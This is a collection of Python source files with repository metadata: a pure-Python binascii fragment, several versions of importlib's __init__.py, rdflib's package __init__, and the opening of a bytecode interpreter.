    0x346ed9fcL, 0xad678846L, 0xda60b8d0L, 0x44042d73L, 0x33031de5L,
    0xaa0a4c5fL, 0xdd0d7cc9L, 0x5005713cL, 0x270241aaL, 0xbe0b1010L,
    0xc90c2086L, 0x5768b525L, 0x206f85b3L, 0xb966d409L, 0xce61e49fL,
    0x5edef90eL, 0x29d9c998L, 0xb0d09822L, 0xc7d7a8b4L, 0x59b33d17L,
    0x2eb40d81L, 0xb7bd5c3bL, 0xc0ba6cadL, 0xedb88320L, 0x9abfb3b6L,
    0x03b6e20cL, 0x74b1d29aL, 0xead54739L, 0x9dd277afL, 0x04db2615L,
    0x73dc1683L, 0xe3630b12L, 0x94643b84L, 0x0d6d6a3eL, 0x7a6a5aa8L,
    0xe40ecf0bL, 0x9309ff9dL, 0x0a00ae27L, 0x7d079eb1L, 0xf00f9344L,
    0x8708a3d2L, 0x1e01f268L, 0x6906c2feL, 0xf762575dL, 0x806567cbL,
    0x196c3671L, 0x6e6b06e7L, 0xfed41b76L, 0x89d32be0L, 0x10da7a5aL,
    0x67dd4accL, 0xf9b9df6fL, 0x8ebeeff9L, 0x17b7be43L, 0x60b08ed5L,
    0xd6d6a3e8L, 0xa1d1937eL, 0x38d8c2c4L, 0x4fdff252L, 0xd1bb67f1L,
    0xa6bc5767L, 0x3fb506ddL, 0x48b2364bL, 0xd80d2bdaL, 0xaf0a1b4cL,
    0x36034af6L, 0x41047a60L, 0xdf60efc3L, 0xa867df55L, 0x316e8eefL,
    0x4669be79L, 0xcb61b38cL, 0xbc66831aL, 0x256fd2a0L, 0x5268e236L,
    0xcc0c7795L, 0xbb0b4703L, 0x220216b9L, 0x5505262fL, 0xc5ba3bbeL,
    0xb2bd0b28L, 0x2bb45a92L, 0x5cb36a04L, 0xc2d7ffa7L, 0xb5d0cf31L,
    0x2cd99e8bL, 0x5bdeae1dL, 0x9b64c2b0L, 0xec63f226L, 0x756aa39cL,
    0x026d930aL, 0x9c0906a9L, 0xeb0e363fL, 0x72076785L, 0x05005713L,
    0x95bf4a82L, 0xe2b87a14L, 0x7bb12baeL, 0x0cb61b38L, 0x92d28e9bL,
    0xe5d5be0dL, 0x7cdcefb7L, 0x0bdbdf21L, 0x86d3d2d4L, 0xf1d4e242L,
    0x68ddb3f8L, 0x1fda836eL, 0x81be16cdL, 0xf6b9265bL, 0x6fb077e1L,
    0x18b74777L, 0x88085ae6L, 0xff0f6a70L, 0x66063bcaL, 0x11010b5cL,
    0x8f659effL, 0xf862ae69L, 0x616bffd3L, 0x166ccf45L, 0xa00ae278L,
    0xd70dd2eeL, 0x4e048354L, 0x3903b3c2L, 0xa7672661L, 0xd06016f7L,
    0x4969474dL, 0x3e6e77dbL, 0xaed16a4aL, 0xd9d65adcL, 0x40df0b66L,
    0x37d83bf0L, 0xa9bcae53L, 0xdebb9ec5L, 0x47b2cf7fL, 0x30b5ffe9L,
    0xbdbdf21cL, 0xcabac28aL, 0x53b39330L, 0x24b4a3a6L, 0xbad03605L,
    0xcdd70693L, 0x54de5729L, 0x23d967bfL, 0xb3667a2eL, 0xc4614ab8L,
    0x5d681b02L, 0x2a6f2b94L, 0xb40bbe37L, 0xc30c8ea1L, 0x5a05df1bL,
    0x2d02ef8dL
]
def crc32(s, crc=0):
result = 0
crc = ~long(crc) & 0xffffffffL
for c in s:
crc = crc_32_tab[(crc ^ long(ord(c))) & 0xffL] ^ (crc >> 8)
#/* Note: (crc >> 8) MUST zero fill on left
result = crc ^ 0xffffffffL
if result > (1 << 31):
result = ((result + (1<<31)) % (1<<32)) - (1<<31)
return result
def b2a_hex(s):
    """Return the hexadecimal representation of string *s*: two lowercase
    hex digits per input character."""
    digits = '0123456789abcdef'
    out = []
    for ch in s:
        code = ord(ch)
        out.append(digits[(code >> 4) & 0xf])   # high nibble
        out.append(digits[code & 0xf])          # low nibble
    return ''.join(out)
# Alias matching the binascii module's public name.
hexlify = b2a_hex
# Maps ASCII code points (0-127) to hex digit values; -1 marks a character
# that is not a hex digit.  Rows of 16: '0'-'9' -> 0-9, 'A'-'F' and
# 'a'-'f' -> 10-15.
table_hex = [
    -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
    -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
    -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
    0, 1, 2, 3, 4, 5, 6, 7, 8, 9,-1,-1, -1,-1,-1,-1,
    -1,10,11,12, 13,14,15,-1, -1,-1,-1,-1, -1,-1,-1,-1,
    -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
    -1,10,11,12, 13,14,15,-1, -1,-1,-1,-1, -1,-1,-1,-1,
    -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1
]
def a2b_hex(t):
    """Return the binary string represented by the hex string *t*.

    Raises TypeError('Odd-length string') when len(t) is odd, and
    TypeError('Non-hexadecimal digit found') when any character is not a
    hex digit.
    """
    result = []
    def pairs_gen(s):
        # Yield (hi, lo) digit values for successive character pairs.
        while s:
            if len(s) == 1:
                raise TypeError('Odd-length string')
            hi, lo = ord(s[0]), ord(s[1])
            # Bug fix: characters with code points >= 128 used to raise
            # IndexError on the 128-entry table and were misreported as
            # 'Odd-length string'; map them to -1 so they are reported as
            # non-hexadecimal instead.
            yield (table_hex[hi] if hi < 128 else -1,
                   table_hex[lo] if lo < 128 else -1)
            s = s[2:]
    for a, b in pairs_gen(t):
        if a < 0 or b < 0:
            raise TypeError('Non-hexadecimal digit found')
        result.append(chr((a << 4) + b))
    return ''.join(result)
unhexlify = a2b_hex | {
"repo_name": "corona10/grumpy",
"path": "grumpy-runtime-src/third_party/pypy/binascii.py",
"copies": "7",
"size": "24270",
"license": "apache-2.0",
"hash": -569507639079837500,
"line_mean": 32.7097222222,
"line_max": 82,
"alpha_frac": 0.4960444994,
"autogenerated": false,
"ratio": 2.5184185949984434,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.005081551954608266,
"num_lines": 720
} |
"""A pure Python implementation of import."""
__all__ = ['__import__', 'import_module', 'invalidate_caches']
# Bootstrap help #####################################################
# Until bootstrapping is complete, DO NOT import any modules that attempt
# to import importlib._bootstrap (directly or indirectly). Since this
# partially initialised package would be present in sys.modules, those
# modules would get an uninitialised copy of the source version, instead
# of a fully initialised version (either the frozen one or the one
# initialised below if the frozen one is not available).
import _imp # Just the builtin component, NOT the full Python module
import sys
from . import machinery #fix me brython
try:
    # Prefer the bootstrap frozen into the interpreter when available.
    import _frozen_importlib as _bootstrap
except ImportError:
    # Fall back to the pure-Python source copy, which must be wired to the
    # interpreter internals (sys, _imp) by hand.
    from . import _bootstrap
    _bootstrap._setup(sys, _imp)
else:
    # importlib._bootstrap is the built-in import, ensure we don't create
    # a second copy of the module.
    _bootstrap.__name__ = 'importlib._bootstrap'
    _bootstrap.__package__ = 'importlib'
    _bootstrap.__file__ = __file__.replace('__init__.py', '_bootstrap.py')
    sys.modules['importlib._bootstrap'] = _bootstrap
# To simplify imports in test code
_w_long = _bootstrap._w_long
_r_long = _bootstrap._r_long
# Fully bootstrapped at this point, import whatever you like, circular
# dependencies and startup overhead minimisation permitting :)
# Public API #########################################################
from ._bootstrap import __import__
def invalidate_caches():
    """Ask every finder on sys.meta_path that supports cache invalidation
    (i.e. exposes an invalidate_caches() method) to drop its caches."""
    for finder in sys.meta_path:
        invalidate = getattr(finder, 'invalidate_caches', None)
        if invalidate is not None:
            invalidate()
def find_loader(name, path=None):
    """Find the loader for the specified module.

    A module already present in sys.modules has its __loader__ returned
    directly (ValueError is raised if that attribute is None).  Otherwise
    the meta path finders are consulted, each receiving 'path'; None is
    returned when no loader can be found.

    Parent packages of a dotted name are NOT imported implicitly; import
    them explicitly, in order, to get a submodule's correct loader.
    """
    if name in sys.modules:
        loader = sys.modules[name].__loader__
        if loader is None:
            raise ValueError('{}.__loader__ is None'.format(name))
        return loader
    return _bootstrap._find_module(name, path)
def import_module(name, package=None):
    """Import a module.

    'package' is required when 'name' is relative (dot-prefixed); it is
    the anchor from which the relative name is resolved.
    """
    # Count the leading dots; they become the import level.
    level = 0
    if name.startswith('.'):
        if not package:
            raise TypeError("relative imports require the 'package' argument")
        while level < len(name) and name[level] == '.':
            level += 1
    return _bootstrap._gcd_import(name[level:], package, level)
#need at least one import hook for importlib stuff to work.
# Install the package-local BaseHook as a meta-path finder.  (basehook is a
# project module; its behavior is not visible from this file.)
from . import basehook
sys.meta_path.append(basehook.BaseHook())
| {
"repo_name": "Mozhuowen/brython",
"path": "www/src/Lib/importlib/__init__.py",
"copies": "12",
"size": "3479",
"license": "bsd-3-clause",
"hash": 2400406564722282000,
"line_mean": 34.8659793814,
"line_max": 80,
"alpha_frac": 0.6659959759,
"autogenerated": false,
"ratio": 4.392676767676767,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0012873356590673189,
"num_lines": 97
} |
"""A pure Python implementation of import."""
__all__ = ['__import__', 'import_module', 'invalidate_caches', 'reload']
# Bootstrap help #####################################################
# Until bootstrapping is complete, DO NOT import any modules that attempt
# to import importlib._bootstrap (directly or indirectly). Since this
# partially initialised package would be present in sys.modules, those
# modules would get an uninitialised copy of the source version, instead
# of a fully initialised version (either the frozen one or the one
# initialised below if the frozen one is not available).
import _imp # Just the builtin component, NOT the full Python module
import sys
try:
    # Prefer the bootstrap frozen into the interpreter when available.
    import _frozen_importlib as _bootstrap
except ImportError:
    # Fall back to the pure-Python source copy and wire it up manually.
    from . import _bootstrap
    _bootstrap._setup(sys, _imp)
else:
    # importlib._bootstrap is the built-in import, ensure we don't create
    # a second copy of the module.
    _bootstrap.__name__ = 'importlib._bootstrap'
    _bootstrap.__package__ = 'importlib'
    _bootstrap.__file__ = __file__.replace('__init__.py', '_bootstrap.py')
    sys.modules['importlib._bootstrap'] = _bootstrap
# To simplify imports in test code
_w_long = _bootstrap._w_long
_r_long = _bootstrap._r_long
# Fully bootstrapped at this point, import whatever you like, circular
# dependencies and startup overhead minimisation permitting :)
import types
import warnings
# Public API #########################################################
from ._bootstrap import __import__
def invalidate_caches():
    """Ask every finder on sys.meta_path that supports cache invalidation
    (i.e. exposes an invalidate_caches() method) to drop its caches."""
    for finder in sys.meta_path:
        invalidate = getattr(finder, 'invalidate_caches', None)
        if invalidate is not None:
            invalidate()
def find_loader(name, path=None):
    """Return the loader for the specified module.

    Deprecated backward-compatibility wrapper; importlib.util.find_spec()
    is the replacement.
    """
    warnings.warn('Use importlib.util.find_spec() instead.',
                  DeprecationWarning, stacklevel=2)
    _absent = object()
    module = sys.modules.get(name, _absent)
    if module is not _absent:
        # Already imported: report its __loader__, complaining when the
        # attribute is missing or unset.
        try:
            loader = module.__loader__
        except AttributeError:
            raise ValueError('{}.__loader__ is not set'.format(name))
        if loader is None:
            raise ValueError('{}.__loader__ is None'.format(name))
        return loader
    spec = _bootstrap._find_spec(name, path)
    # We won't worry about malformed specs (missing attributes).
    if spec is None:
        return None
    if spec.loader is not None:
        return spec.loader
    if spec.submodule_search_locations is None:
        raise ImportError('spec for {} missing loader'.format(name),
                          name=name)
    raise ImportError('namespace packages do not have loaders',
                      name=name)
def import_module(name, package=None):
    """Import a module.

    'package' is required when 'name' is relative (dot-prefixed); it is
    the anchor from which the relative name is resolved.
    """
    # Count the leading dots; they become the import level.
    level = 0
    if name.startswith('.'):
        if not package:
            raise TypeError("the 'package' argument is required to perform "
                            "a relative import for {!r}".format(name))
        while level < len(name) and name[level] == '.':
            level += 1
    return _bootstrap._gcd_import(name[level:], package, level)
# Modules currently being reloaded, keyed by name; used to break recursion
# when a reload re-triggers a reload of the same module.
_RELOADING = {}
def reload(module):
    """Reload the module and return it.
    The module must have been successfully imported before.
    """
    if not module or not isinstance(module, types.ModuleType):
        raise TypeError("reload() argument must be module")
    try:
        # Prefer the spec name; fall back for modules without a __spec__.
        name = module.__spec__.name
    except AttributeError:
        name = module.__name__
    if sys.modules.get(name) is not module:
        msg = "module {} not in sys.modules"
        raise ImportError(msg.format(name), name=name)
    if name in _RELOADING:
        # Re-entrant reload of the same module: return the in-flight one.
        return _RELOADING[name]
    _RELOADING[name] = module
    try:
        parent_name = name.rpartition('.')[0]
        if parent_name:
            # A submodule needs its parent's __path__ to be re-found.
            try:
                parent = sys.modules[parent_name]
            except KeyError:
                msg = "parent {!r} not in sys.modules"
                raise ImportError(msg.format(parent_name), name=parent_name)
            else:
                pkgpath = parent.__path__
        else:
            pkgpath = None
        target = module
        spec = module.__spec__ = _bootstrap._find_spec(name, pkgpath, target)
        # Re-execute the module's code in its existing namespace.
        methods = _bootstrap._SpecMethods(spec)
        methods.exec(module)
        # The module may have replaced itself in sys.modules!
        return sys.modules[name]
    finally:
        try:
            del _RELOADING[name]
        except KeyError:
            pass
| {
"repo_name": "tpsatish95/Python-Workshop",
"path": "Python Environment Setup/Alternate/1. Python/1. Installer/Python-3.4.0(Linux)/Lib/importlib/__init__.py",
"copies": "6",
"size": "4990",
"license": "apache-2.0",
"hash": -8442914687888726000,
"line_mean": 32.0463576159,
"line_max": 78,
"alpha_frac": 0.6158316633,
"autogenerated": false,
"ratio": 4.459338695263628,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0011125463940033478,
"num_lines": 151
} |
"""A pure Python implementation of import.
References on import:
* Language reference
http://docs.python.org/ref/import.html
* __import__ function
http://docs.python.org/lib/built-in-funcs.html
* Packages
http://www.python.org/doc/essays/packages.html
* PEP 235: Import on Case-Insensitive Platforms
http://www.python.org/dev/peps/pep-0235
* PEP 275: Import Modules from Zip Archives
http://www.python.org/dev/peps/pep-0273
* PEP 302: New Import Hooks
http://www.python.org/dev/peps/pep-0302/
* PEP 328: Imports: Multi-line and Absolute/Relative
http://www.python.org/dev/peps/pep-0328
"""
__all__ = ['__import__', 'import_module']
from . import _bootstrap
import os
import re
import tokenize
# Bootstrap help #####################################################
def _case_ok(directory, check):
"""Check if the directory contains something matching 'check'.
No check is done if the file/directory exists or not.
"""
if 'PYTHONCASEOK' in os.environ:
return True
elif check in os.listdir(directory if directory else os.getcwd()):
return True
return False
def _w_long(x):
"""Convert a 32-bit integer to little-endian.
XXX Temporary until marshal's long functions are exposed.
"""
x = int(x)
int_bytes = []
int_bytes.append(x & 0xFF)
int_bytes.append((x >> 8) & 0xFF)
int_bytes.append((x >> 16) & 0xFF)
int_bytes.append((x >> 24) & 0xFF)
return bytearray(int_bytes)
def _r_long(int_bytes):
"""Convert 4 bytes in little-endian to an integer.
XXX Temporary until marshal's long function are exposed.
"""
x = int_bytes[0]
x |= int_bytes[1] << 8
x |= int_bytes[2] << 16
x |= int_bytes[3] << 24
return x
# Required built-in modules.
# Pick whichever low-level OS built-in this platform provides.
try:
    import posix as _os
except ImportError:
    try:
        import nt as _os
    except ImportError:
        try:
            import os2 as _os
        except ImportError:
            raise ImportError('posix, nt, or os2 module required for importlib')
# Inject runtime dependencies into the bootstrap module; it cannot import
# them itself while the import machinery is still being set up.
_bootstrap._os = _os
import imp, sys, marshal, errno, _io
_bootstrap.imp = imp
_bootstrap.sys = sys
_bootstrap.marshal = marshal
_bootstrap.errno = errno
_bootstrap._io = _io
import _warnings
_bootstrap._warnings = _warnings
from os import sep
# For os.path.join replacement; pull from Include/osdefs.h:SEP .
_bootstrap.path_sep = sep
_bootstrap._case_ok = _case_ok
# Patch marshal with the byte-order helpers defined above.
marshal._w_long = _w_long
marshal._r_long = _r_long
# Public API #########################################################
from ._bootstrap import __import__
def import_module(name, package=None):
    """Import a module.

    'package' is required when 'name' is relative (dot-prefixed); it is
    the anchor from which the relative name is resolved.
    """
    # Count the leading dots; they become the import level.
    level = 0
    if name.startswith('.'):
        if not package:
            raise TypeError("relative imports require the 'package' argument")
        while level < len(name) and name[level] == '.':
            level += 1
    return _bootstrap._gcd_import(name[level:], package, level)
| {
"repo_name": "RockySteveJobs/python-for-android",
"path": "python3-alpha/python3-src/Lib/importlib/__init__.py",
"copies": "51",
"size": "3236",
"license": "apache-2.0",
"hash": -490999631127492300,
"line_mean": 25.0967741935,
"line_max": 80,
"alpha_frac": 0.6152657602,
"autogenerated": false,
"ratio": 3.784795321637427,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": null,
"num_lines": null
} |
"""A pure Python implementation of import."""
__all__ = ['__import__', 'import_module', 'invalidate_caches', 'reload']
# Bootstrap help #####################################################
# Until bootstrapping is complete, DO NOT import any modules that attempt
# to import importlib._bootstrap (directly or indirectly). Since this
# partially initialised package would be present in sys.modules, those
# modules would get an uninitialised copy of the source version, instead
# of a fully initialised version (either the frozen one or the one
# initialised below if the frozen one is not available).
import _imp # Just the builtin component, NOT the full Python module
import sys
try:
    # Prefer the bootstrap frozen into the interpreter when available.
    import _frozen_importlib as _bootstrap
except ImportError:
    # Fall back to the pure-Python source copy and wire it up manually.
    from . import _bootstrap
    _bootstrap._setup(sys, _imp)
else:
    # importlib._bootstrap is the built-in import, ensure we don't create
    # a second copy of the module.
    _bootstrap.__name__ = 'importlib._bootstrap'
    _bootstrap.__package__ = 'importlib'
    try:
        _bootstrap.__file__ = __file__.replace('__init__.py', '_bootstrap.py')
    except NameError:
        # __file__ is not guaranteed to be defined, e.g. if this code gets
        # frozen by a tool like cx_Freeze.
        pass
    sys.modules['importlib._bootstrap'] = _bootstrap
# Same dance for the filesystem half of the bootstrap (split out in 3.5).
try:
    import _frozen_importlib_external as _bootstrap_external
except ImportError:
    from . import _bootstrap_external
    _bootstrap_external._setup(_bootstrap)
    _bootstrap._bootstrap_external = _bootstrap_external
else:
    _bootstrap_external.__name__ = 'importlib._bootstrap_external'
    _bootstrap_external.__package__ = 'importlib'
    try:
        _bootstrap_external.__file__ = __file__.replace('__init__.py', '_bootstrap_external.py')
    except NameError:
        # __file__ is not guaranteed to be defined, e.g. if this code gets
        # frozen by a tool like cx_Freeze.
        pass
    sys.modules['importlib._bootstrap_external'] = _bootstrap_external
# To simplify imports in test code
_w_long = _bootstrap_external._w_long
_r_long = _bootstrap_external._r_long
# Fully bootstrapped at this point, import whatever you like, circular
# dependencies and startup overhead minimisation permitting :)
import types
import warnings
# Public API #########################################################
from ._bootstrap import __import__
def invalidate_caches():
    """Ask every finder on sys.meta_path that supports cache invalidation
    (i.e. exposes an invalidate_caches() method) to drop its caches."""
    for finder in sys.meta_path:
        invalidate = getattr(finder, 'invalidate_caches', None)
        if invalidate is not None:
            invalidate()
def find_loader(name, path=None):
    """Return the loader for the specified module.

    Deprecated backward-compatibility wrapper; importlib.util.find_spec()
    is the replacement.
    """
    warnings.warn('Use importlib.util.find_spec() instead.',
                  DeprecationWarning, stacklevel=2)
    _absent = object()
    module = sys.modules.get(name, _absent)
    if module is not _absent:
        # Already imported: report its __loader__, complaining when the
        # attribute is missing or unset.
        try:
            loader = module.__loader__
        except AttributeError:
            raise ValueError('{}.__loader__ is not set'.format(name)) from None
        if loader is None:
            raise ValueError('{}.__loader__ is None'.format(name))
        return loader
    spec = _bootstrap._find_spec(name, path)
    # We won't worry about malformed specs (missing attributes).
    if spec is None:
        return None
    if spec.loader is not None:
        return spec.loader
    if spec.submodule_search_locations is None:
        raise ImportError('spec for {} missing loader'.format(name),
                          name=name)
    raise ImportError('namespace packages do not have loaders',
                      name=name)
def import_module(name, package=None):
    """Import a module.

    'package' is required when 'name' is relative (dot-prefixed); it is
    the anchor from which the relative name is resolved.
    """
    # Count the leading dots; they become the import level.
    level = 0
    if name.startswith('.'):
        if not package:
            raise TypeError("the 'package' argument is required to perform "
                            "a relative import for {!r}".format(name))
        while level < len(name) and name[level] == '.':
            level += 1
    return _bootstrap._gcd_import(name[level:], package, level)
# Modules currently being reloaded, keyed by name; used to break recursion
# when a reload re-triggers a reload of the same module.
_RELOADING = {}
def reload(module):
    """Reload the module and return it.
    The module must have been successfully imported before.
    """
    if not module or not isinstance(module, types.ModuleType):
        raise TypeError("reload() argument must be module")
    try:
        # Prefer the spec name; fall back for modules without a __spec__.
        name = module.__spec__.name
    except AttributeError:
        name = module.__name__
    if sys.modules.get(name) is not module:
        msg = "module {} not in sys.modules"
        raise ImportError(msg.format(name), name=name)
    if name in _RELOADING:
        # Re-entrant reload of the same module: return the in-flight one.
        return _RELOADING[name]
    _RELOADING[name] = module
    try:
        parent_name = name.rpartition('.')[0]
        if parent_name:
            # A submodule needs its parent's __path__ to be re-found.
            try:
                parent = sys.modules[parent_name]
            except KeyError:
                msg = "parent {!r} not in sys.modules"
                raise ImportError(msg.format(parent_name),
                                  name=parent_name) from None
            else:
                pkgpath = parent.__path__
        else:
            pkgpath = None
        target = module
        spec = module.__spec__ = _bootstrap._find_spec(name, pkgpath, target)
        # Re-execute the module's code in its existing namespace.
        _bootstrap._exec(spec, module)
        # The module may have replaced itself in sys.modules!
        return sys.modules[name]
    finally:
        try:
            del _RELOADING[name]
        except KeyError:
            pass
| {
"repo_name": "grupoprog3/proyecto_final",
"path": "proyecto/flask/Lib/importlib/__init__.py",
"copies": "1",
"size": "6041",
"license": "apache-2.0",
"hash": -4303004180038793000,
"line_mean": 32.9190751445,
"line_max": 96,
"alpha_frac": 0.6007283562,
"autogenerated": false,
"ratio": 4.491449814126394,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5592178170326394,
"avg_score": null,
"num_lines": null
} |
"""A pure Python implementation of import."""
__all__ = ['__import__', 'import_module', 'invalidate_caches']
# Bootstrap help #####################################################
# Until bootstrapping is complete, DO NOT import any modules that attempt
# to import importlib._bootstrap (directly or indirectly). Since this
# partially initialised package would be present in sys.modules, those
# modules would get an uninitialised copy of the source version, instead
# of a fully initialised version (either the frozen one or the one
# initialised below if the frozen one is not available).
import _imp # Just the builtin component, NOT the full Python module
import sys
from . import machinery #fix me brython
try:
    # Prefer the bootstrap frozen into the interpreter when available.
    import _frozen_importlib as _bootstrap
except ImportError:
    # Fall back to the pure-Python source copy and wire it up manually.
    from . import _bootstrap
    _bootstrap._setup(sys, _imp)
else:
    # importlib._bootstrap is the built-in import, ensure we don't create
    # a second copy of the module.
    _bootstrap.__name__ = 'importlib._bootstrap'
    _bootstrap.__package__ = 'importlib'
    _bootstrap.__file__ = __file__.replace('__init__.py', '_bootstrap.py')
    sys.modules['importlib._bootstrap'] = _bootstrap
# To simplify imports in test code
_w_long = _bootstrap._w_long
_r_long = _bootstrap._r_long
# Fully bootstrapped at this point, import whatever you like, circular
# dependencies and startup overhead minimisation permitting :)
# Public API #########################################################
from ._bootstrap import __import__
def invalidate_caches():
    """Ask every finder on sys.meta_path that supports cache invalidation
    (i.e. exposes an invalidate_caches() method) to drop its caches."""
    for finder in sys.meta_path:
        invalidate = getattr(finder, 'invalidate_caches', None)
        if invalidate is not None:
            invalidate()
def find_loader(name, path=None):
    """Find the loader for the specified module.

    A module already present in sys.modules has its __loader__ returned
    directly (ValueError is raised if that attribute is None).  Otherwise
    the meta path finders are consulted, each receiving 'path'; None is
    returned when no loader can be found.

    Parent packages of a dotted name are NOT imported implicitly; import
    them explicitly, in order, to get a submodule's correct loader.
    """
    if name in sys.modules:
        loader = sys.modules[name].__loader__
        if loader is None:
            raise ValueError('{}.__loader__ is None'.format(name))
        return loader
    return _bootstrap._find_module(name, path)
def import_module(name, package=None):
    """Import a module.

    'package' is required when 'name' is relative (dot-prefixed); it is
    the anchor from which the relative name is resolved.
    """
    # Count the leading dots; they become the import level.
    level = 0
    if name.startswith('.'):
        if not package:
            raise TypeError("relative imports require the 'package' argument")
        while level < len(name) and name[level] == '.':
            level += 1
    return _bootstrap._gcd_import(name[level:], package, level)
#need at least one import hook for importlib stuff to work.
# Install the package-local BaseHook as a meta-path finder.  (basehook is a
# project module; its behavior is not visible from this file.)
from . import basehook
sys.meta_path.append(basehook.BaseHook())
| {
"repo_name": "nattee/cafe-grader-web",
"path": "lib/assets/Lib/importlib/__init__.py",
"copies": "7",
"size": "3576",
"license": "mit",
"hash": -3941000819250131500,
"line_mean": 34.8659793814,
"line_max": 80,
"alpha_frac": 0.6479306488,
"autogenerated": false,
"ratio": 4.431226765799257,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0012504002368258057,
"num_lines": 97
} |
"""A pure Python package providing the core RDF constructs.
The packages is intended to provide the core RDF types and interfaces
for working with RDF. The package defines a plugin interface for
parsers, stores, and serializers that other packages can use to
implement parsers, stores, and serializers that will plug into the
rdflib package.
The primary interface `rdflib` exposes to work with RDF is
`rdflib.graph.Graph`.
A tiny example:
>>> from rdflib import Graph, URIRef, Literal
>>> g = Graph()
>>> result = g.parse("http://www.w3.org/2000/10/swap/test/meet/blue.rdf")
>>> print("graph has %s statements." % len(g))
graph has 4 statements.
>>>
>>> for s, p, o in g:
... if (s, p, o) not in g:
... raise Exception("It better be!")
>>> s = g.serialize(format='nt')
>>>
>>> sorted(g) == [
... (URIRef(u'http://meetings.example.com/cal#m1'),
... URIRef(u'http://www.example.org/meeting_organization#homePage'),
... URIRef(u'http://meetings.example.com/m1/hp')),
... (URIRef(u'http://www.example.org/people#fred'),
... URIRef(u'http://www.example.org/meeting_organization#attending'),
... URIRef(u'http://meetings.example.com/cal#m1')),
... (URIRef(u'http://www.example.org/people#fred'),
... URIRef(u'http://www.example.org/personal_details#GivenName'),
... Literal(u'Fred')),
... (URIRef(u'http://www.example.org/people#fred'),
... URIRef(u'http://www.example.org/personal_details#hasEmail'),
... URIRef(u'mailto:fred@example.com'))
... ]
True
"""
# Package-level metadata for rdflib.
__docformat__ = "restructuredtext en"

# The format of the __version__ line is matched by a regex in setup.py
__version__ = "4.2.1"
__date__ = "2015/08/12"

# Names re-exported as the package's public API; the actual imports
# happen at the bottom of this module.
__all__ = [
    'URIRef',
    'BNode',
    'Literal',
    'Variable',

    'Namespace',

    'Dataset',
    'Graph',
    'ConjunctiveGraph',

    'RDF',
    'RDFS',
    'OWL',
    'XSD',

    'util',
]

import sys
# Fail fast on interpreters older than the oldest supported version.
assert sys.version_info >= (2, 5, 0), "rdflib requires Python 2.5 or higher"
del sys
import logging

# Configure logging only when running interactively (no __main__.__file__),
# so that library users embedding rdflib keep control of their own logging
# configuration.
try:
    import __main__

    if not hasattr(__main__, '__file__'):
        # show log messages in interactive mode
        logging.basicConfig(level=logging.INFO)
except ImportError:
    # __main__ already imported from elsewhere
    import warnings
    warnings.warn('__main__ already imported', ImportWarning)
    del warnings

logger = logging.getLogger(__name__)
logger.info("RDFLib Version: %s" % __version__)
# Warn on "narrow" Python 2 builds, where code points above U+FFFF are
# stored as surrogate pairs and len(u"\U0010FFFF") == 2, breaking
# slicing/regexp assumptions.  On a wide build unichr(0x10FFFF) succeeds.
try:
    unichr(0x10FFFF)
except NameError:
    # Python 3: unichr no longer exists and every build is wide, so
    # there is nothing to warn about.  (Previously this NameError
    # escaped and crashed the import under Python 3.)
    pass
except ValueError:
    import warnings
    warnings.warn(
        'You are using a narrow Python build!\n'
        'This means that your Python does not properly support chars > 16bit.\n'
        'On your system chars like c=u"\\U0010FFFF" will have a len(c)==2.\n'
        'As this can cause hard to debug problems with string processing\n'
        '(slicing, regexp, ...) later on, we strongly advise to use a wide\n'
        'Python build in production systems.',
        ImportWarning)
    del warnings
NORMALIZE_LITERALS = True
"""
If True - Literals lexical forms are normalized when created.
I.e. the lexical forms is parsed according to data-type, then the
stored lexical form is the re-serialized value that was parsed.
Illegal values for a datatype are simply kept. The normalized keyword
for Literal.__new__ can override this.
For example:
>>> from rdflib import Literal,XSD
>>> Literal("01", datatype=XSD.int)
rdflib.term.Literal(u'1', datatype=rdflib.term.URIRef(u'http://www.w3.org/2001/XMLSchema#integer'))
This flag may be changed at any time, but will only affect literals
created after that time, previously created literals will remain
(un)normalized.
"""
DAWG_LITERAL_COLLATION = False
"""
DAWG_LITERAL_COLLATION determines how literals are ordered or compared
to each other.
In SPARQL, applying the >,<,>=,<= operators to literals of
incompatible data-types is an error, i.e:
Literal(2)>Literal('cake') is neither true nor false, but an error.
This is a problem in PY3, where lists of Literals of incompatible
types can no longer be sorted.
Setting this flag to True gives you strict DAWG/SPARQL compliance,
setting it to False will order Literals with incompatible datatypes by
datatype URI
In particular, this determines how the rich comparison operators for
Literal work, eq, __neq__, __lt__, etc.
"""
from rdflib.term import (
URIRef, BNode, Literal, Variable)
from rdflib.namespace import Namespace
from rdflib.graph import Dataset, Graph, ConjunctiveGraph
from rdflib.namespace import RDF, RDFS, OWL, XSD
from rdflib import plugin
from rdflib import query
# tedious sop to flake8
assert plugin
assert query
from rdflib import util
| {
"repo_name": "unor/schemaorg",
"path": "lib/rdflib/__init__.py",
"copies": "6",
"size": "4692",
"license": "apache-2.0",
"hash": 6132113990458167000,
"line_mean": 27.6097560976,
"line_max": 99,
"alpha_frac": 0.6768968457,
"autogenerated": false,
"ratio": 3.4474650991917706,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.003260379154237539,
"num_lines": 164
} |
"""A pure-Python Python bytecode interpreter."""
# Based on:
# pyvm2 by Paul Swartz (z3p), from http://www.twistedmatrix.com/users/z3p/
from __future__ import print_function, division
import dis
import inspect
import linecache
import logging
import operator
import sys
import six
from six.moves import reprlib
PY3, PY2 = six.PY3, not six.PY3
from .pyobj import Cell, Frame, Block, Method, Function, Generator
log = logging.getLogger(__name__)
if six.PY3:
byteint = lambda b: b
else:
byteint = ord
# Create a repr that won't overflow.
repr_obj = reprlib.Repr()
repr_obj.maxother = 120
repper = repr_obj.repr
import inspect
import symex
